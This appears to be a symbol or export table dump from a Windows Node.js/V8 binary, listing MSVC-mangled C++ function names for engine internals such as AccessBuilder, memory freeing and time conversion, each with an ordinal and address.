                                                                                                                                                                                                                                    ?ForJSIteratorResultDone@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69450x141215f50
                                                                                                                                                                                                                                    ?ForJSIteratorResultValue@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69460x141215f90
                                                                                                                                                                                                                                    ?ForJSObjectElements@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69470x1412170f0
                                                                                                                                                                                                                                    ?ForJSObjectInObjectProperty@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@AEBVMapRef@234@HVMachineType@34@@Z69480x141217140
                                                                                                                                                                                                                                    ?ForJSObjectOffset@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@HW4WriteBarrierKind@234@@Z69490x1412171a0
                                                                                                                                                                                                                                    ?ForJSObjectPropertiesOrHash@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69500x1412160f0
                                                                                                                                                                                                                                    ?ForJSObjectPropertiesOrHashKnownPointer@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69510x1412171e0
                                                                                                                                                                                                                                    ?ForJSRegExpData@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69520x141215f90
                                                                                                                                                                                                                                    ?ForJSRegExpFlags@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69530x141217220
                                                                                                                                                                                                                                    ?ForJSRegExpLastIndex@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69540x141216fc0
                                                                                                                                                                                                                                    ?ForJSRegExpSource@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69550x141215f50
                                                                                                                                                                                                                                    ?ForJSStringIteratorIndex@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69560x141217260
                                                                                                                                                                                                                                    ?ForJSStringIteratorString@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69570x141216170
                                                                                                                                                                                                                                    ?ForJSTypedArrayBasePointer@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69580x1412172c0
                                                                                                                                                                                                                                    ?ForJSTypedArrayExternalPointer@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69590x141217300
                                                                                                                                                                                                                                    ?ForJSTypedArrayLength@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69600x141217340
                                                                                                                                                                                                                                    ?ForMap@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@W4WriteBarrierKind@234@@Z69610x1412173a0
                                                                                                                                                                                                                                    ?ForMapBitField2@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69620x1412173e0
                                                                                                                                                                                                                                    ?ForMapBitField3@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69630x1412163d0
                                                                                                                                                                                                                                    ?ForMapBitField@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69640x141217440
                                                                                                                                                                                                                                    ?ForMapDescriptors@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69650x1412174a0
                                                                                                                                                                                                                                    ?ForMapInstanceType@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69660x1412174e0
                                                                                                                                                                                                                                    ?ForMapNativeContext@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69670x141217540
                                                                                                                                                                                                                                    ?ForMapPrototype@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69680x141217580
                                                                                                                                                                                                                                    ?ForModuleRegularExports@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69690x1412175c0
                                                                                                                                                                                                                                    ?ForModuleRegularImports@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69700x141217600
                                                                                                                                                                                                                                    ?ForNameRawHashField@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69710x141217640
                                                                                                                                                                                                                                    ?ForOrderedHashMapEntryValue@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@XZ69720x141217680
                                                                                                                                                                                                                                    ?ForOrderedHashMapOrSetNextTable@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69730x1412176b0
                                                                                                                                                                                                                                    ?ForOrderedHashMapOrSetNumberOfBuckets@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69740x141216d20
                                                                                                                                                                                                                                    ?ForOrderedHashMapOrSetNumberOfDeletedElements@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69750x1412176f0
                                                                                                                                                                                                                                    ?ForOrderedHashMapOrSetNumberOfElements@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69760x141217750
                                                                                                                                                                                                                                    ?ForPropertyArrayLengthAndHash@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69770x1412177b0
                                                                                                                                                                                                                                    ?ForScopeInfoFlags@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69780x1412177b0
                                                                                                                                                                                                                                    ?ForScriptCompile@UnoptimizedCompileFlags@internal@v8@@SA?AV123@PEAVIsolate@23@VScript@23@@Z69790x1408c8bf0
                                                                                                                                                                                                                                    ?ForSeqOneByteStringCharacter@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@XZ69800x141217800
                                                                                                                                                                                                                                    ?ForSeqTwoByteStringCharacter@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@XZ69810x141217840
                                                                                                                                                                                                                                    ?ForSlicedStringOffset@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69820x1412167c0
                                                                                                                                                                                                                                    ?ForSlicedStringParent@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69830x141216130
                                                                                                                                                                                                                                    ?ForSloppyArgumentsElementsArguments@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69840x141217580
                                                                                                                                                                                                                                    ?ForSloppyArgumentsElementsContext@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69850x141217880
                                                                                                                                                                                                                                    ?ForSloppyArgumentsElementsMappedEntry@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@XZ69860x1412178c0
                                                                                                                                                                                                                                    ?ForStackArgument@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@XZ69870x1412178f0
                                                                                                                                                                                                                                    ?ForStringLength@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69880x141217920
                                                                                                                                                                                                                                    ?ForTest@UnoptimizedCompileFlags@internal@v8@@SA?AV123@PEAVIsolate@23@@Z69890x1408c8cf0
                                                                                                                                                                                                                                    ?ForTesting@ScannerStream@internal@v8@@SA?AV?$unique_ptr@VUtf16CharacterStream@internal@v8@@U?$default_delete@VUtf16CharacterStream@internal@v8@@@std@@@std@@PEBD@Z69900x14088a640
                                                                                                                                                                                                                                    ?ForTesting@ScannerStream@internal@v8@@SA?AV?$unique_ptr@VUtf16CharacterStream@internal@v8@@U?$default_delete@VUtf16CharacterStream@internal@v8@@@std@@@std@@PEBD_K@Z69910x14088a6e0
                                                                                                                                                                                                                                    ?ForTesting@ScannerStream@internal@v8@@SA?AV?$unique_ptr@VUtf16CharacterStream@internal@v8@@U?$default_delete@VUtf16CharacterStream@internal@v8@@@std@@@std@@PEBG_K@Z69920x14088a770
                                                                                                                                                                                                                                    ?ForThinStringActual@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69930x141216130
                                                                                                                                                                                                                                    ?ForToplevelCompile@UnoptimizedCompileFlags@internal@v8@@SA?AV123@PEAVIsolate@23@_NW4LanguageMode@23@W4REPLMode@23@W4ScriptType@3@1@Z69940x1408c8d10
                                                                                                                                                                                                                                    ?ForToplevelFunction@UnoptimizedCompileFlags@internal@v8@@SA?AV123@V123@PEBVFunctionLiteral@23@@Z69950x1408c8dc0
                                                                                                                                                                                                                                    ?ForTypedArrayElement@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@W4ExternalArrayType@34@_N@Z69960x141217980
                                                                                                                                                                                                                                    ?ForWeakFixedArrayElement@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@XZ69970x141216660
                                                                                                                                                                                                                                    ?ForWeakFixedArrayLength@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69980x141217aa0
                                                                                                                                                                                                                                    ?ForWeakFixedArraySlot@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@H@Z69990x141217b00
                                                                                                                                                                                                                                    ?ForceAddSignature@WasmModuleBuilder@wasm@internal@v8@@QEAAIPEBV?$Signature@VValueType@wasm@internal@v8@@@34@I@Z70000x140634ed0
                                                                                                                                                                                                                                    ?ForceCompactionForNextGarbageCollection@StandaloneTestingHeap@testing@cppgc@@QEAAXXZ70010x140504f10
                                                                                                                                                                                                                                    ?ForceContextAllocationForParameters@Scope@internal@v8@@QEAAXXZ70020x1407ff210
                                                                                                                                                                                                                                    ?ForceContextForLanguageMode@Scope@internal@v8@@QEBA_NXZ70030x1407ff220
                                                                                                                                                                                                                                    ?ForceEagerCompilation@DeclarationScope@internal@v8@@QEAAXXZ70040x1407ff240
                                                                                                                                                                                                                                    ?ForceGarbageCollectionSlow@Heap@cppgc@@QEAAXPEBD0W4EmbedderStackState@2@@Z70050x140518560
                                                                                                                                                                                                                                    ?Format@ErrorThrower@wasm@internal@v8@@AEAAXW4ErrorType@1234@PEBDPEAD@Z70060x14061ff40
                                                                                                                                                                                                                                    ?Format@MessageFormatter@internal@v8@@SA?AV?$MaybeHandle@VString@internal@v8@@@23@PEAVIsolate@23@W4MessageTemplate@23@V?$Handle@VString@internal@v8@@@23@22@Z70070x140b5bf10
                                                                                                                                                                                                                                    ?FormatError@WasmError@wasm@internal@v8@@KA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEBDPEAD@Z70080x14061ffc0
                                                                                                                                                                                                                                    ?FormatErrorMessageForTest@PendingCompilationErrorHandler@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@PEAVIsolate@23@@Z70090x1408b81b0
                                                                                                                                                                                                                                    ?FoundHtmlComment@Scanner@internal@v8@@QEBA_NXZ70100x14053f9b0
                                                                                                                                                                                                                                    ?FrameFunctionCount@StackTraceFrameIterator@internal@v8@@QEBAHXZ70110x140b7af60
                                                                                                                                                                                                                                    ?FrameState@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@VBytecodeOffset@34@VOutputFrameStateCombine@234@PEBVFrameStateFunctionInfo@234@@Z70120x14103a7e0
                                                                                                                                                                                                                                    ?FrameStateCount@CallDescriptor@compiler@internal@v8@@QEBA_KXZ70130x14057eec0
                                                                                                                                                                                                                                    ?Free@AddressSpaceReservation@base@v8@@QEAA_NPEAX_K@Z70140x140ff3e50
                                                                                                                                                                                                                                    ?Free@FreeListManyCached@internal@v8@@UEAA_K_K0W4FreeMode@23@@Z70150x140b1f570
                                                                                                                                                                                                                                    ?Free@InvalidatedSlotsCleanup@internal@v8@@QEAAX_K0@Z70160x140a98b40
                                                                                                                                                                                                                                    ?Free@MemoryAllocator@internal@v8@@QEAAXW4FreeMode@123@PEAVMemoryChunk@23@@Z70170x140abd360
                                                                                                                                                                                                                                    ?Free@NormalPageMemoryRegion@internal@cppgc@@QEAAXPEAE@Z70180x14050d800
                                                                                                                                                                                                                                    ?Free@OS@base@v8@@CAXPEAX_K@Z70190x140ff3e80
                                                                                                                                                                                                                                    ?Free@PagedSpace@internal@v8@@QEAA_K_K0W4SpaceAccountingMode@23@@Z70200x14053f9c0
                                                                                                                                                                                                                                    ?Free@VirtualMemory@internal@v8@@QEAAXXZ70210x1407bc920
                                                                                                                                                                                                                                    ?FreeAddressSpaceReservation@OS@base@v8@@CAXVAddressSpaceReservation@23@@Z70220x140ff3eb0
                                                                                                                                                                                                                                    ?FreeArrayBufferAllocator@node@@YAXPEAVArrayBufferAllocator@1@@Z70230x140097540
                                                                                                                                                                                                                                    ?FreeBufferMemory@Delegate@ValueSerializer@v8@@UEAAXPEAX@Z70240x1402a60e0
                                                                                                                                                                                                                                    ?FreeCode@NativeModule@wasm@internal@v8@@QEAAXV?$Vector@QEAVWasmCode@wasm@internal@v8@@@base@4@@Z70250x140661a60
                                                                                                                                                                                                                                    ?FreeCurrentEmbeddedBlob@internal@v8@@YAXXZ70260x140b69f50
                                                                                                                                                                                                                                    ?FreeDeadCode@WasmEngine@wasm@internal@v8@@QEAAXAEBV?$unordered_map@PEAVNativeModule@wasm@internal@v8@@V?$vector@PEAVWasmCode@wasm@internal@v8@@V?$allocator@PEAVWasmCode@wasm@internal@v8@@@std@@@std@@U?$hash@PEAVNativeModule@wasm@internal@v8@@@6@U?$equal_to@PEAVNativeModule@wasm@internal@v8@@@6@V?$allocator@U?$pair@QEAVNativeModule@wasm@internal@v8@@V?$vector@PEAVWasmCode@wasm@internal@v8@@V?$allocator@PEAVWasmCode@wasm@internal@v8@@@std@@@std@@@std@@@6@@std@@@Z70270x14064cb70
                                                                                                                                                                                                                                    ?FreeDeadCodeLocked@WasmEngine@wasm@internal@v8@@QEAAXAEBV?$unordered_map@PEAVNativeModule@wasm@internal@v8@@V?$vector@PEAVWasmCode@wasm@internal@v8@@V?$allocator@PEAVWasmCode@wasm@internal@v8@@@std@@@std@@U?$hash@PEAVNativeModule@wasm@internal@v8@@@6@U?$equal_to@PEAVNativeModule@wasm@internal@v8@@@6@V?$allocator@U?$pair@QEAVNativeModule@wasm@internal@v8@@V?$vector@PEAVWasmCode@wasm@internal@v8@@V?$allocator@PEAVWasmCode@wasm@internal@v8@@@std@@@std@@@std@@@6@@std@@@Z70280x14064cbc0
                                                                                                                                                                                                                                    ?FreeDebugInfoListNode@Debug@internal@v8@@AEAAXPEAVDebugInfoListNode@23@0@Z70290x140bba8b0
                                                                                                                                                                                                                                    ?FreeEnvironment@node@@YAXPEAVEnvironment@1@@Z70300x14029e000
                                                                                                                                                                                                                                    ?FreeGuardRegion@VirtualAddressSpace@base@v8@@UEAAX_K0@Z70310x140ffc4c0
                                                                                                                                                                                                                                    ?FreeGuardRegion@VirtualAddressSubspace@base@v8@@UEAAX_K0@Z70320x140ffc4d0
                                                                                                                                                                                                                                    ?FreeIsolateData@node@@YAXPEAVIsolateData@1@@Z70330x140097540
                                                                                                                                                                                                                                    ?FreeLargePageMemory@PageBackend@internal@cppgc@@QEAAXPEAE@Z70340x14050d950
                                                                                                                                                                                                                                    ?FreeLinearAllocationArea@LocalHeap@internal@v8@@QEAAXXZ70350x140af1c20
                                                                                                                                                                                                                                    ?FreeLinearAllocationArea@NewSpace@internal@v8@@UEAAXXZ70360x140ab7ff0
                                                                                                                                                                                                                                    ?FreeLinearAllocationArea@PagedSpace@internal@v8@@UEAAXXZ70370x140aacc80
                                                                                                                                                                                                                                    ?FreeListAddRegion@RegionAllocator@base@v8@@AEAAXPEAVRegion@123@@Z70380x141000aa0
                                                                                                                                                                                                                                    ?FreeListFindRegion@RegionAllocator@base@v8@@AEAAPEAVRegion@123@_K@Z70390x141000ba0
                                                                                                                                                                                                                                    ?FreeListRemoveRegion@RegionAllocator@base@v8@@AEAAXPEAVRegion@123@@Z70400x141000be0
                                                                                                                                                                                                                                    ?FreeNativeModule@WasmCodeManager@wasm@internal@v8@@AEAAXV?$Vector@VVirtualMemory@internal@v8@@@base@4@_K@Z70410x140661f00
                                                                                                                                                                                                                                    ?FreeNativeModule@WasmEngine@wasm@internal@v8@@QEAAXPEAVNativeModule@234@@Z70420x14064cfb0
                                                                                                                                                                                                                                    ?FreeNode@CrossThreadPersistentRegion@internal@cppgc@@QEAAXPEAVPersistentNode@23@@Z70430x14053fa50
                                                                                                                                                                                                                                    ?FreeNode@PersistentRegion@internal@cppgc@@QEAAXPEAVPersistentNode@23@@Z70440x14053fa90
                                                                                                                                                                                                                                    ?FreeNode@PersistentRegionBase@internal@cppgc@@IEAAXPEAVPersistentNode@23@@Z70450x14053fa90
                                                                                                                                                                                                                                    ?FreeNormalPageMemory@PageBackend@internal@cppgc@@QEAAX_KPEAE@Z70460x14050db00
                                                                                                                                                                                                                                    ?FreePages@BoundedPageAllocator@base@v8@@UEAA_NPEAX_K@Z70470x140ffb980
                                                                                                                                                                                                                                    ?FreePages@PageAllocator@base@v8@@UEAA_NPEAX_K@Z70480x140ff63b0
                                                                                                                                                                                                                                    ?FreePages@VirtualAddressSpace@base@v8@@UEAAX_K0@Z70490x140ffc4c0
                                                                                                                                                                                                                                    ?FreePages@VirtualAddressSubspace@base@v8@@UEAAX_K0@Z70500x140ffc540
                                                                                                                                                                                                                                    ?FreePages@internal@v8@@YAXPEAVPageAllocator@2@PEAX_K@Z70510x1407bca00
                                                                                                                                                                                                                                    ?FreePlatform@node@@YAXPEAVMultiIsolatePlatform@1@@Z70520x140097540
                                                                                                                                                                                                                                    ?FreeQueuedChunks@Unmapper@MemoryAllocator@internal@v8@@QEAAXXZ70530x140abd430
                                                                                                                                                                                                                                    ?FreeReadOnly@VirtualMemory@internal@v8@@QEAAXXZ70540x1407bca30
                                                                                                                                                                                                                                    ?FreeRegion@RegionAllocator@base@v8@@QEAA_K_K@Z70550x140ffba40
                                                                                                                                                                                                                                    ?FreeShared@AddressSpaceReservation@base@v8@@QEAA_NPEAX_K@Z70560x140ff3ef0
                                                                                                                                                                                                                                    ?FreeShared@OS@base@v8@@CAXPEAX_K@Z70570x140ff3f30
                                                                                                                                                                                                                                    ?FreeSharedLinearAllocationArea@LocalHeap@internal@v8@@QEAAXXZ70580x140af1c40
                                                                                                                                                                                                                                    ?FreeSharedPages@VirtualAddressSpace@base@v8@@UEAAX_K0@Z70590x140ffc5e0
                                                                                                                                                                                                                                    ?FreeSharedPages@VirtualAddressSubspace@base@v8@@UEAAX_K0@Z70600x140ffc5f0
                                                                                                                                                                                                                                    ?FreeSubReservation@AddressSpaceReservation@base@v8@@SA_NV123@@Z70610x140097530
                                                                                                                                                                                                                                    ?FreeSubspace@VirtualAddressSpace@base@v8@@EEAAXPEAVVirtualAddressSubspace@23@@Z70620x140ffc690
                                                                                                                                                                                                                                    ?FreeSubspace@VirtualAddressSubspace@base@v8@@EEAAXPEAV123@@Z70630x140ffc6b0
                                                                                                                                                                                                                                    ?FreeThreadResources@Debug@internal@v8@@QEAAXXZ70640x1400971a0
                                                                                                                                                                                                                                    ?FreeThreadResources@Isolate@internal@v8@@QEAAXXZ70650x14053fab0
                                                                                                                                                                                                                                    ?FreeThreadResources@StackGuard@internal@v8@@QEAAXXZ70660x140b585e0
                                                                                                                                                                                                                                    ?FreeUnmarkedObjects@LargeObjectSpace@internal@v8@@UEAAXXZ70670x140af3fd0
                                                                                                                                                                                                                                    ?FreeUnreferencedObject@ExplicitManagementImpl@internal@cppgc@@CAXAEAVHeapHandle@3@PEAX@Z70680x14051d0e0
                                                                                                                                                                                                                                    ?Freeze@SignatureMap@wasm@internal@v8@@QEAAXXZ70690x14012f3d0
                                                                                                                                                                                                                                    ?From@CppHeap@internal@v8@@SAPEAV123@PEAV13@@Z70700x140503ce0
                                                                                                                                                                                                                                    ?From@CppHeap@internal@v8@@SAPEBV123@PEBV13@@Z70710x140503ce0
                                                                                                                                                                                                                                    ?From@GlobalHandles@internal@v8@@CAPEAV123@PEBVTracedNode@123@@Z70720x140b4cc80
                                                                                                                                                                                                                                    ?From@Heap@internal@cppgc@@SAPEAV123@PEAV13@@Z70730x140503ce0
                                                                                                                                                                                                                                    ?From@Heap@internal@cppgc@@SAPEBV123@PEBV13@@Z70740x140503ce0
                                                                                                                                                                                                                                    ?From@HeapBase@internal@cppgc@@SAAEAV123@AEAVHeapHandle@3@@Z70750x140503d00
                                                                                                                                                                                                                                    ?From@HeapBase@internal@cppgc@@SAAEBV123@AEBVHeapHandle@3@@Z70760x140503d00
                                                                                                                                                                                                                                    ?From@LargePage@internal@cppgc@@SAPEAV123@PEAVBasePage@23@@Z70770x1400972c0
                                                                                                                                                                                                                                    ?From@LargePage@internal@cppgc@@SAPEBV123@PEBVBasePage@23@@Z70780x1400972c0
                                                                                                                                                                                                                                    ?From@LargePageSpace@internal@cppgc@@SAAEAV123@AEAVBaseSpace@23@@Z70790x1400972c0
                                                                                                                                                                                                                                    ?From@LargePageSpace@internal@cppgc@@SAAEBV123@AEBVBaseSpace@23@@Z70800x1400972c0
                                                                                                                                                                                                                                    ?From@NormalPage@internal@cppgc@@SAPEAV123@PEAVBasePage@23@@Z70810x1400972c0
                                                                                                                                                                                                                                    ?From@NormalPage@internal@cppgc@@SAPEBV123@PEBVBasePage@23@@Z70820x1400972c0
                                                                                                                                                                                                                                    ?From@NormalPageSpace@internal@cppgc@@SAAEAV123@AEAVBaseSpace@23@@Z70830x1400972c0
                                                                                                                                                                                                                                    ?From@NormalPageSpace@internal@cppgc@@SAAEBV123@AEBVBaseSpace@23@@Z70840x1400972c0
                                                                                                                                                                                                                                    ?FromAddress@Bitmap@internal@v8@@SAPEAV123@_K@Z70850x1400972c0
                                                                                                                                                                                                                                    ?FromBackgroundThread@NexusConfig@internal@v8@@SA?AV123@PEAVIsolate@23@PEAVLocalHeap@23@@Z70860x140504370
                                                                                                                                                                                                                                    ?FromByte@Bytecodes@interpreter@internal@v8@@SA?AW4Bytecode@234@E@Z70870x14053fac0
                                                                                                                                                                                                                                    ?FromCompiledModule@WasmModuleObject@v8@@SA?AV?$MaybeLocal@VWasmModuleObject@v8@@@2@PEAVIsolate@2@AEBVCompiledWasmModule@2@@Z70880x140c82c70
                                                                                                                                                                                                                                    ?FromContext@WasmFeatures@wasm@internal@v8@@SA?AV1234@PEAVIsolate@34@V?$Handle@VContext@internal@v8@@@34@@Z70890x140645880
                                                                                                                                                                                                                                    ?FromCurrentPage@PagedSpaceObjectIterator@internal@v8@@AEAA?AVHeapObject@23@XZ70900x14053fad0
                                                                                                                                                                                                                                    ?FromDays@TimeDelta@base@v8@@SA?AV123@H@Z70910x140ff1ab0
                                                                                                                                                                                                                                    ?FromDouble@TimeDelta@base@v8@@CA?AV123@N@Z70920x140ff1ad0
                                                                                                                                                                                                                                    ?FromFiletime@Time@base@v8@@SA?AV123@U_FILETIME@@@Z70930x140ff1b30
                                                                                                                                                                                                                                    ?FromHandle@FeedbackNexus@internal@v8@@AEBA?AVMaybeObject@23@VMaybeObjectHandle@23@@Z70940x14053fb80
                                                                                                                                                                                                                                    ?FromHeap@Isolate@internal@v8@@SAPEAV123@PEAVHeap@23@@Z70950x14052c780
                                                                                                                                                                                                                                    ?FromHeap@LocalIsolate@internal@v8@@SAPEAV123@PEAVLocalHeap@23@@Z70960x14053fbb0
                                                                                                                                                                                                                                    ?FromHours@TimeDelta@base@v8@@SA?AV123@H@Z70970x140ff1bb0
                                                                                                                                                                                                                                    ?FromInnerAddress@BasePage@internal@cppgc@@SAPEAV123@PEBVHeapBase@23@PEAX@Z70980x14051a370
                                                                                                                                                                                                                                    ?FromInnerAddress@BasePage@internal@cppgc@@SAPEBV123@PEBVHeapBase@23@PEBX@Z70990x14051a370
                                                                                                                                                                                                                                    ?FromInt64@BigInt@internal@v8@@SA?AV?$Handle@VBigInt@internal@v8@@@23@PEAVIsolate@23@_J@Z71000x140a03b50
                                                                                                                                                                                                                                    ?FromInternalValue@?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@SA?AVThreadTicks@34@_J@Z71010x140097ad0
                                                                                                                                                                                                                                    ?FromInternalValue@?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@SA?AVTime@34@_J@Z71020x140097ad0
                                                                                                                                                                                                                                    ?FromInternalValue@?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@SA?AVTimeTicks@34@_J@Z71030x140097ad0
                                                                                                                                                                                                                                    ?FromIsolate@WasmFeatures@wasm@internal@v8@@SA?AV1234@PEAVIsolate@34@@Z71040x140645a00
                                                                                                                                                                                                                                    ?FromJsTime@Time@base@v8@@SA?AV123@N@Z71050x140ff1bd0
                                                                                                                                                                                                                                    ?FromJustIsNothing@api_internal@v8@@YAXXZ71060x140c82d10
                                                                                                                                                                                                                                    ?FromMainThread@NexusConfig@internal@v8@@SA?AV123@PEAVIsolate@23@@Z71070x14051ac10
                                                                                                                                                                                                                                    ?FromMicroseconds@TimeDelta@base@v8@@SA?AV123@_J@Z71080x140097ad0
                                                                                                                                                                                                                                    ?FromMilliseconds@TimeDelta@base@v8@@SA?AV123@_J@Z71090x140ff1c10
                                                                                                                                                                                                                                    ?FromMillisecondsD@TimeDelta@base@v8@@SA?AV123@N@Z71100x140c82d80
                                                                                                                                                                                                                                    ?FromMinutes@TimeDelta@base@v8@@SA?AV123@H@Z71110x140ff1c20
                                                                                                                                                                                                                                    ?FromNanoseconds@TimeDelta@base@v8@@SA?AV123@_J@Z71120x140ff1c40
                                                                                                                                                                                                                                    ?FromNumber@BigInt@internal@v8@@SA?AV?$MaybeHandle@VBigInt@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z71130x140a03bf0
                                                                                                                                                                                                                                    ?FromOperand@Register@interpreter@internal@v8@@SA?AV1234@H@Z71140x14053fbc0
                                                                                                                                                                                                                                    ?FromParameterIndex@Register@interpreter@internal@v8@@SA?AV1234@H@Z71150x140a37680
                                                                                                                                                                                                                                    ?FromPayload@BasePage@internal@cppgc@@SAPEAV123@PEAX@Z71160x140503d10
                                                                                                                                                                                                                                    ?FromPayload@BasePage@internal@cppgc@@SAPEBV123@PEBX@Z71170x140503d10
                                                                                                                                                                                                                                    ?FromRawAddress@ExternalReference@internal@v8@@SA?AV123@_K@Z71180x140097ad0
                                                                                                                                                                                                                                    ?FromRootAddress@Isolate@internal@v8@@SAPEAV123@_K@Z71190x14053fbd0
                                                                                                                                                                                                                                    ?FromSeconds@TimeDelta@base@v8@@SA?AV123@_J@Z71200x140ff1c70
                                                                                                                                                                                                                                    ?FromSecondsD@TimeDelta@base@v8@@SA?AV123@N@Z71210x140ff1c80
                                                                                                                                                                                                                                    ?FromShortStar@Register@interpreter@internal@v8@@SA?AV1234@W4Bytecode@234@@Z71220x14053fbe0
                                                                                                                                                                                                                                    ?FromSnapshot@Context@v8@@SA?AV?$MaybeLocal@VContext@v8@@@2@PEAVIsolate@2@_KUDeserializeInternalFieldsCallback@2@PEAVExtensionConfiguration@2@V?$MaybeLocal@VValue@v8@@@2@PEAVMicrotaskQueue@2@@Z71230x140c82df0
                                                                                                                                                                                                                                    ?FromSpaceContains@NewSpace@internal@v8@@QEBA_NVObject@23@@Z71240x14053fbf0
                                                                                                                                                                                                                                    ?FromTypeBase@Type@compiler@internal@v8@@CA?AV1234@PEAVTypeBase@234@@Z71250x140097ad0
                                                                                                                                                                                                                                    ?FroundType@AsmType@wasm@internal@v8@@SAPEAV1234@PEAVZone@34@@Z71260x14072f9f0
                                                                                                                                                                                                                                    ?Fulfill@JSPromise@internal@v8@@SA?AV?$Handle@VObject@internal@v8@@@23@V?$Handle@VJSPromise@internal@v8@@@23@V423@@Z71270x14090dfa0
                                                                                                                                                                                                                                    ?FulfillPromise@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ71280x1410c4bb0
                                                                                                                                                                                                                                    ?FullIsNull@Value@v8@@AEBA_NXZ71290x140c82ea0
                                                                                                                                                                                                                                    ?FullIsString@Value@v8@@AEBA_NXZ71300x140c82ee0
                                                                                                                                                                                                                                    ?FullIsUndefined@Value@v8@@AEBA_NXZ71310x140c82f00
                                                                                                                                                                                                                                    ?Function@AsmType@wasm@internal@v8@@SAPEAV1234@PEAVZone@34@PEAV1234@@Z71320x14072fa40
                                                                                                                                                                                                                                    ?Function@SourceLocation@cppgc@@QEBAPEBDXZ71330x140097290
                                                                                                                                                                                                                                    ?Function@Type@compiler@internal@v8@@SA?AV1234@XZ71340x14057eed0
                                                                                                                                                                                                                                    ?FunctionCount@ScriptData@Coverage@debug@v8@@QEBA_KXZ71350x140bc9fa0
                                                                                                                                                                                                                                    ?FunctionForId@Runtime@internal@v8@@SAPEBUFunction@123@W4FunctionId@123@@Z71360x1407f0c90
                                                                                                                                                                                                                                    ?FunctionKindFor@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA?AW4FunctionKind@23@V?$Flags@W4ParseFunctionFlag@internal@v8@@H@base@3@@Z71370x14088ec80
                                                                                                                                                                                                                                    ?FunctionKindForImpl@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA?AW4FunctionKind@23@W4SubFunctionKind@123@V?$Flags@W4ParseFunctionFlag@internal@v8@@H@base@3@@Z71380x14088eca0
                                                                                                                                                                                                                                    ?FunctionName@ScopeInfo@internal@v8@@QEBA?AVObject@23@XZ71390x1408f1a40
                                                                                                                                                                                                                                    ?FunctionProtoToString@Function@v8@@QEAA?AV?$MaybeLocal@VString@v8@@@2@V?$Local@VContext@v8@@@2@@Z71400x140c82f40
                                                                                                                                                                                                                                    ?Function_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ71410x14053fc40
                                                                                                                                                                                                                                    ?Function_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ71420x1407dfb80
                                                                                                                                                                                                                                    ?FuseFloatingControl@Scheduler@compiler@internal@v8@@AEAAXPEAVBasicBlock@234@PEAVNode@234@@Z71430x1411d82a0
                                                                                                                                                                                                                                    ?GCInfoFromIndex@GCInfoTable@internal@cppgc@@QEBAAEBUGCInfo@23@G@Z71440x140504640
